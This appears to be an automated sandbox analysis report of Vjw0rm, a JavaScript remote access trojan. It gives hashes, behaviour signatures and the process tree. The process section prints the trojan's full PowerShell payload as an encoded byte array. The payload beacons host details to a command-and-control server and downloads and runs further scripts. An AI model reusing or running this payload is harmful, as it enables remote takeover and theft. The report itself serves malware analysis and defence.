Overview

overview

10

Static

static

ID99827299202.js

windows7_x64

10

ID99827299202.js

windows10_x64

10

Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    21-05-2021 16:20

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ID99827299202.js

  • Size

    29KB

  • MD5

    da2054c4d6c5a5051a82ef276afb3342

  • SHA1

    924772e4c5112c6463bf986377c17b1e6e529642

  • SHA256

    8e5146485d183e60079662c903e943a3deaa854d2de07b764811385748381c46

  • SHA512

    f72c09c604319f97217355469718e544574cb4c4958736e151b72e97a6b4b484096f314c0249476b8c3fd5aa014fbe057e52628672439495d88b7a48f45c9899

Score
10/10
vjw0rmtrojanworm

Malware Config

Signatures

  • Vjw0rm

    Vjw0rm is a remote access trojan written in JavaScript.

    trojanwormvjw0rm
  • Blocklisted process makes network request 1 IoCs
  • Drops startup file 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\ID99827299202.js
    1⤵
    • Drops startup file
    • Suspicious use of WriteProcessMemory
    PID:1904
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy rEmOtEsIgNeD -Command Invoke-Expression ([System.Text.Encoding]::Default.GetString(@(65,100,100,45,84,121,112,101,32,45,65,115,115,101,109,98,108,121,78,97,109,101,32,83,121,115,116,101,109,46,87,105,110,100,111,119,115,46,70,111,114,109,115,13,10,65,100,100,45,84,121,112,101,32,45,65,115,115,101,109,98,108,121,78,97,109,101,32,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,13,10,13,10,36,104,116,116,112,111,98,106,32,61,32,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,73,110,116,101,114,97,99,116,105,111,110,93,58,58,67,114,101,97,116,101,79,98,106,101,99,116,40,34,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,34,41,13,10,36,104,32,61,32,34,119,111,100,109,97,105,110,101,110,101,119,46,120,121,122,34,13,10,36,112,32,61,32,34,56,55,50,48,34,13,10,36,86,98,115,80,97,116,104,32,61,32,34,37,86,98,115,112,97,116,104,37,34,13,10,36,83,84,85,80,67,111,112,121,32,61,32,34,37,83,116,97,114,116,117,112,37,34,13,10,36,115,112,108,32,61,32,34,124,86,124,34,13,10,36,69,114,114,111,114,65,99,116,105,111,110,80,114,101,102,101,114,101,110,99,101,32,61,32,39,83,105,108,101,110,116,108,121,67,111,110,116,105,110,117,101,39,13,10,13,10,102,117,110,99,116,105,111,110,32,73,110,115,40,41,32,123,13,10,32,32,32,32,36,68,101,115,116,105,110,97,116,105,111,110,32,61,32,91,83,121,115,116,101,109,46,69,110,118,105,114,111,110,109,101,110,116,93,58,58,71,101,116,70,111,108,100,101,114,80,97,116,104,40,52,32,43,32,51,41,32,43,32,34,92,34,32,43,32,34,83,121,115,116,101,109,84,114,97,121,54,52,46,106,115,34,13,10,32,32,32,32,105,102,32,40,36,83,84,85,80,67,111,112,121,32,45,101,113,32,34,84,114,117,101,34,41,32,123,13,10,32,32,32,32,32,32,32,36,67,111,109,109,97,110,100,32,61,32,40,66,105,110,97,114,121,50,83,116,114,105,110,103,40,34,44,46,44,44,44,44,46,46,44,46,46,44,46,46,46,46,44,46,46,46,44,44,44,44,44,46,46,46,46,44,44,46,44,44,46,44,46,46,44,46,44,46,44,44,46,44,44,46,44,46,46,46,44,46,44,44,44,46,46,44,44,46,44,46,44,46,46,44,46,46,44,46,34,46,82,101,112,108,97,99,101,40,34,44,34,44,32,34,48,34,41,46,82,101,112,108,97,99,101,40,34,46,34,44,32,34,49,34,41,41,41,32,43,32,34,32,39,34,32,43,32,36,86,98,115,80,97,116,104,32,43,32,34,39,32,39,34,32,43,32,36,68,101,115,116,105,110,97,116,105,111,110,32,43,32,34,39,34,13,10,32,32,32,32,32,32,32,35,73,110,118,111,107,101,45,69,120,112,114,101,115,115,105,111,110,32,36,67,111,109,109,97,110,100,13,10,32,32,32,32,125,13,10,125,13,10,13,10,102,117,110,99,116,105,111,110,32,71,101,116,45,65,110,116,105,118,105,114,117,115,78,97,109,101,32,123,13,10,91,99,109,100,108,101,116,66,105,110,100,105,110,103,40,41,93,32,32,32,32,32,13,10,112,97,114,97,109,32,40,32,13,10,91,115,116,114,105,110,103,93,36,67,111,109,112,117,116,101,114,78,97,109,101,32,61,32,34,36,101,110,118,58,99,111,109,112,117,116,101,114,110,97,109,101,34,32,44,32,13,10,36,67,114,101,100,101,110,116,105,97,108,32,13,10,41,32,13,10,32,32,32,32,66,69,71,73,78,32,32,13,10,32,32,32,32,32,32,32,32,123,13,10,32,32,32,32,32,32,32,32,32,32,32,32,36,119,109,105,81,117,101,114,121,32,61,32,34,83,69,76,69,67,84,32,42,32,70,82,79,77,32,65,110,116,105,86,105,114,117,115,80,114,111,100,117,99,116,34,13,10,32,32,32,32,32,32,32,32,125,13,10,32,32,32,32,80,82,79,67,69,83,83,32,32,13,10,32,32,32,32,32,32,32,32,123,13,10,32,32,32,32,32,32,32,32,32,32,32,32,36,65,110,116,105,118,105,114,117,115,80,114,111,100,117,99,116,32,61,32,71,101,116,45,87,109,105,79,98,106,101,99,116,32,45,78,97,109,101,115,112,97,99,101,32,34,114,111,111,116,92,83,101,99,117,114,105,116,121,67,101,110,116,101,114,50,34,32,45,81,117,101,114,121,32,36,119,109,105,81,117,101,114,121,32,32,64,112,115,98,111,117,110,100,112,97,114,97,109,101,116,101,114,115,32,32,32,32,32,32,32,32,32,32,13,10,32,32,32,32,32,32,32,32,32,32,32,32,114,101,116,117,114,110,32,36,65,110,116,105,118,105,114,117,115,80,114,111,100,117,99,116,46,100,105,115,112,108,97,121,78,97,109,101,13,10,32,32,32,32,32,32,32,32,125,32,13,10,32,32,32,32,69,78,68,32,123,32,13,10,32,32,32,32,32,32,32,32,125,32,13,10,125,13,10,13,10,70,117,110,99,116,105,111,110,32,66,105,110,97,114,121,50,83,116,114,105,110,103,40,91,83,116,114,105,110,103,93,32,36,100,97,116,97,41,32,123,13,10,32,32,32,32,36,98,121,116,101,76,105,115,116,32,61,32,91,83,121,115,116,101,109,46,67,111,108,108,101,99,116,105,111,110,115,46,71,101,110,101,114,105,99,46,76,105,115,116,91,66,121,116,101,93,93,58,58,110,101,119,40,41,13,10,32,32,32,32,102,111,114,32,40,36,105,32,61,32,48,59,32,36,105,32,45,108,116,32,36,100,97,116,97,46,76,101,110,103,116,104,59,32,36,105,32,43,61,56,41,32,123,13,10,32,32,32,32,32,32,32,32,36,98,121,116,101,76,105,115,116,46,65,100,100,40,91,67,111,110,118,101,114,116,93,58,58,84,111,66,121,116,101,40,36,100,97,116,97,46,83,117,98,115,116,114,105,110,103,40,36,105,44,32,56,41,44,32,50,41,41,13,10,32,32,32,32,125,13,10,32,32,32,32,114,101,116,117,114,110,32,91,83,121,115,116,101,109,46,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,65,83,67,73,73,46,71,101,116,83,116,114,105,110,103,40,36,98,121,116,101,76,105,115,116,46,84,111,65,114,114,97,121,40,41,41,13,10,125,13,10,13,10,102,117,110,99,116,105,111,110,32,80,79,83,84,40,36,68,65,44,32,36,80,97,114,97,109,41,32,123,13,10,36,82,101,115,112,111,110,115,101,84,101,120,116,32,61,32,34,34,13,10,116,114,121,13,10,123,13,10,36,104,116,116,112,111,98,106,46,79,112,101,110,40,34,80,79,83,84,34,44,32,34,104,116,116,112,58,47,47,34,32,43,32,36,104,32,43,32,34,58,34,32,43,32,36,112,32,43,32,34,47,34,32,43,32,36,68,65,44,32,36,102,97,108,115,101,41,13,10,36,104,116,116,112,111,98,106,46,83,101,116,82,101,113,117,101,115,116,72,101,97,100,101,114,40,34,85,115,101,114,45,65,103,101,110,116,58,34,44,32,36,105,110,102,111,41,13,10,36,104,116,116,112,111,98,106,46,83,101,110,100,40,36,80,97,114,97,109,41,13,10,36,82,101,115,112,111,110,115,101,84,101,120,116,32,61,32,91,83,121,115,116,101,109,46,67,111,110,118,101,114,116,93,58,58,84,111,83,116,114,105,110,103,40,36,104,116,116,112,111,98,106,46,82,101,115,112,111,110,115,101,84,101,120,116,41,13,10,125,32,99,97,116,99,104,32,123,32,125,13,10,114,101,116,117,114,110,32,36,82,101,115,112,111,110,115,101,84,101,120,116,13,10,125,13,10,13,10,102,117,110,99,116,105,111,110,32,105,110,102,32,123,13,10,32,32,32,32,36,97,118,32,61,32,71,101,116,45,65,110,116,105,118,105,114,117,115,78,97,109,101,13,10,32,32,32,32,36,118,114,32,61,32,34,118,50,46,48,34,13,10,32,32,32,32,36,109,97,99,32,61,32,72,87,73,68,40,36,101,110,118,58,99,111,109,112,117,116,101,114,110,97,109,101,41,13,10,32,32,32,32,36,105,100,32,61,32,36,119,111,114,109,73,68,32,43,32,34,34,32,43,32,36,109,97,99,13,10,32,32,32,32,36,111,115,32,61,32,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,83,116,114,105,110,103,115,93,58,58,83,112,108,105,116,40,40,71,101,116,45,87,77,73,79,98,106,101,99,116,32,119,105,110,51,50,95,111,112,101,114,97,116,105,110,103,115,121,115,116,101,109,41,46,110,97,109,101,44,34,124,34,41,91,48,93,32,43,32,34,32,34,32,43,32,40,71,101,116,45,87,109,105,79,98,106,101,99,116,32,87,105,110,51,50,95,79,112,101,114,97,116,105,110,103,83,121,115,116,101,109,41,46,79,83,65,114,99,104,105,116,101,99,116,117,114,101,13,10,32,32,32,32,114,101,116,117,114,110,32,36,105,100,32,43,32,34,92,34,32,43,32,40,36,101,110,118,58,67,79,77,80,85,84,69,82,78,65,77,69,41,32,43,32,34,92,34,32,43,32,40,36,101,110,118,58,85,115,101,114,78,97,109,101,41,32,43,32,34,92,34,32,43,32,36,111,115,32,43,32,34,92,34,32,43,32,36,97,118,32,43,32,34,92,34,32,43,32,34,89,101,115,34,32,43,32,34,92,34,32,43,32,34,89,101,115,34,32,43,32,34,92,34,32,43,32,34,70,65,76,83,69,34,32,43,32,34,92,34,13,10,125,13,10,13,10,102,117,110,99,116,105,111,110,32,72,87,73,68,40,36,115,116,114,67,111,109,112,117,116,101,114,41,32,123,13,10,36,69,114,114,111,114,65,99,116,105,111,110,80,114,101,102,101,114,101,110,99,101,32,61,32,39,83,105,108,101,110,116,108,121,67,111,110,116,105,110,117,101,39,13,10,32,32,32,32,36,108,111,108,32,61,32,91,83,121,115,116,101,109,46,67,111,110,118,101,114,116,93,58,58,84,111,83,116,114,105,110,103,40,40,103,101,116,45,119,109,105,111,98,106,101,99,116,32,87,105,110,51,50,95,67,111,109,112,117,116,101,114,83,121,115,116,101,109,80,114,111,100,117,99,116,32,32,124,32,83,101,108,101,99,116,45,79,98,106,101,99,116,32,45,69,120,112,97,110,100,80,114,111,112,101,114,116,121,32,85,85,73,68,41,41,13,10,32,32,32,32,114,101,116,117,114,110,32,40,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,83,116,114,105,110,103,115,93,58,58,83,112,108,105,116,40,36,108,111,108,44,39,45,39,41,91,48,93,32,43,32,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,83,116,114,105,110,103,115,93,58,58,83,112,108,105,116,40,36,108,111,108,44,39,45,39,41,91,49,93,41,13,10,125,13,10,13,10,36,105,110,102,111,32,61,32,105,110,102,13,10,73,110,115,13,10,13,10,119,104,105,108,101,40,36,116,114,117,101,41,13,10,123,13,10,36,65,32,61,32,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,83,116,114,105,110,103,115,93,58,58,83,112,108,105,116,40,40,80,79,83,84,40,34,86,114,101,34,44,32,34,34,41,41,32,44,32,36,115,112,108,41,13,10,115,119,105,116,99,104,40,36,65,91,48,93,41,32,123,13,10,32,32,34,82,70,34,32,123,13,10,32,32,32,32,36,84,97,114,103,101,116,80,97,116,104,32,61,32,91,83,121,115,116,101,109,46,73,79,46,80,97,116,104,93,58,58,71,101,116,84,101,109,112,80,97,116,104,40,41,32,43,32,36,65,91,50,93,13,10,32,32,32,32,91,83,121,115,116,101,109,46,73,79,46,70,105,108,101,93,58,58,87,114,105,116,101,65,108,108,66,121,116,101,115,40,36,84,97,114,103,101,116,80,97,116,104,44,32,91,83,121,115,116,101,109,46,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,68,101,102,97,117,108,116,46,71,101,116,66,121,116,101,115,40,36,65,91,49,93,41,41,13,10,32,32,32,32,91,83,121,115,116,101,109,46,68,105,97,103,110,111,115,116,105,99,115,46,80,114,111,99,101,115,115,93,58,58,83,116,97,114,116,40,36,84,97,114,103,101,116,80,97,116,104,41,13,10,32,32,98,114,101,97,107,32,125,13,10,32,32,34,84,82,34,32,123,13,10,32,32,32,32,91,83,116,114,105,110,103,93,32,36,80,115,70,105,108,101,78,97,109,101,32,61,32,32,91,83,121,115,116,101,109,46,71,117,105,100,93,58,58,78,101,119,71,117,105,100,40,41,46,84,111,83,116,114,105,110,103,40,41,46,82,101,112,108,97,99,101,40,34,45,34,44,32,34,34,41,32,43,32,34,46,80,83,49,34,13,10,32,32,32,32,36,84,97,114,103,101,116,80,97,116,104,32,61,32,91,83,121,115,116,101,109,46,73,79,46,80,97,116,104,93,58,58,71,101,116,84,101,109,112,80,97,116,104,40,41,32,43,32,36,80,115,70,105,108,101,78,97,109,101,13,10,32,32,32,32,91,83,121,115,116,101,109,46,73,79,46,70,105,108,101,93,58,58,87,114,105,116,101,65,108,108,84,101,120,116,40,36,84,97,114,103,101,116,80,97,116,104,44,32,36,65,91,49,93,41,13,10,32,32,32,32,80,111,119,101,114,115,104,101,108,108,46,101,120,101,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,66,121,112,97,115,115,32,45,87,105,110,100,111,119,83,116,121,108,101,32,72,105,100,100,101,110,32,45,70,105,108,101,32,36,84,97,114,103,101,116,80,97,116,104,13,10,13,10,32,32,32,32,35,91,83,121,115,116,101,109,46,73,79,46,70,105,108,101,93,58,58,87,114,105,116,101,65,108,108,84,101,120,116,40,91,83,121,115,116,101,109,46,69,110,118,105,114,111,110,109,101,110,116,93,58,58,71,101,116,70,111,108,100,101,114,80,97,116,104,40,55,41,32,43,32,34,92,34,32,43,32,36,80,115,70,105,108,101,78,97,109,101,46,82,101,112,108,97,99,101,40,34,46,80,83,49,34,44,32,34,46,99,109,100,34,41,44,32,34,80,111,119,101,114,115,104,101,108,108,46,101,120,101,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,66,121,112,97,115,115,32,45,119,105,110,100,111,119,115,116,121,108,101,32,104,105,100,100,101,110,32,45,70,105,108,101,32,34,32,43,32,36,84,97,114,103,101,116,80,97,116,104,41,13,10,32,32,98,114,101,97,107,32,125,13,10,32,32,34,101,120,99,34,32,123,13,10,32,32,32,32,36,70,105,108,101,110,97,109,101,32,61,32,45,106,111,105,110,32,40,40,54,53,46,46,57,48,41,32,43,32,40,57,55,46,46,49,50,50,41,32,124,32,71,101,116,45,82,97,110,100,111,109,32,45,67,111,117,110,116,32,53,32,124,32,37,32,123,91,99,104,97,114,93,36,95,125,41,32,43,32,34,46,118,98,115,34,13,10,32,32,32,32,36,84,97,114,103,101,116,80,97,116,104,32,61,32,91,83,121,115,116,101,109,46,73,79,46,80,97,116,104,93,58,58,71,101,116,84,101,109,112,80,97,116,104,40,41,32,43,32,36,70,105,108,101,110,97,109,101,13,10,32,32,32,32,36,67,117,114,114,83,99,32,61,32,36,65,91,49,93,13,10,32,32,32,32,91,83,121,115,116,101,109,46,73,79,46,70,105,108,101,93,58,58,87,114,105,116,101,65,108,108,84,101,120,116,40,36,84,97,114,103,101,116,80,97,116,104,44,32,36,67,117,114,114,83,99,41,13,10,32,32,32,32,91,83,121,115,116,101,109,46,68,105,97,103,110,111,115,116,105,99,115,46,80,114,111,99,101,115,115,93,58,58,83,116,97,114,116,40,36,84,97,114,103,101,116,80,97,116,104,41,13,10,32,32,98,114,101,97,107,32,125,13,10,32,32,34,83,99,34,32,123,13,10,32,32,32,32,36,84,97,114,103,101,116,80,97,116,104,32,61,32,91,83,121,115,116,101,109,46,73,79,46,80,97,116,104,93,58,58,71,101,116,84,101,109,112,80,97,116,104,40,41,32,43,32,36,65,91,50,93,13,10,32,32,32,32,91,83,121,115,116,101,109,46,73,79,46,70,105,108,101,93,58,58,87,114,105,116,101,65,108,108,84,101,120,116,40,36,84,97,114,103,101,116,80,97,116,104,44,32,36,65,91,49,93,41,13,10,32,32,32,32,91,83,121,115,116,101,109,46,68,105,97,103,110,111,115,116,105,99,115,46,80,114,111,99,101,115,115,93,58,58,83,116,97,114,116,40,36,84,97,114,103,101,116,80,97,116,104,41,13,10,32,32,98,114,101,97,107,32,125,13,10,34,67,108,34,32,123,13,10,32,32,32,32,91,83,121,115,116,101,109,46,69,110,118,105,114,111,110,109,101,110,116,93,58,58,69,120,105,116,40,48,41,13,10,32,32,98,114,101,97,107,32,125,13,10,32,32,34,85,110,34,32,123,13,10,32,32,32,32,91,83,121,115,116,101,109,46,69,110,118,105,114,111,110,109,101,110,116,93,58,58,69,120,105,116,40,48,41,13,10,32,32,98,114,101,97,107,32,125,13,10,32,32,125,13,10,91,83,121,115,116,101,109,46,84,104,114,101,97,100,105,110,103,46,84,104,114,101,97,100,93,58,58,83,108,101,101,112,40,51,48,48,48,41,13,10,125)))
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1832

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1832-60-0x0000000000000000-mapping.dmp

    Download

  • memory/1832-61-0x000007FEFB741000-0x000007FEFB743000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1832-62-0x0000000001EE0000-0x0000000001EE1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1832-63-0x000000001ABA0000-0x000000001ABA1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1832-65-0x00000000024E0000-0x00000000024E1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1832-66-0x000000001AA64000-0x000000001AA66000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1832-64-0x000000001AA60000-0x000000001AA62000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1832-67-0x0000000001DD0000-0x0000000001DD1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1832-68-0x000000001B710000-0x000000001B711000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1832-69-0x000000001A9C0000-0x000000001A9C1000-memory.dmp

    Filesize

    4KB

    Download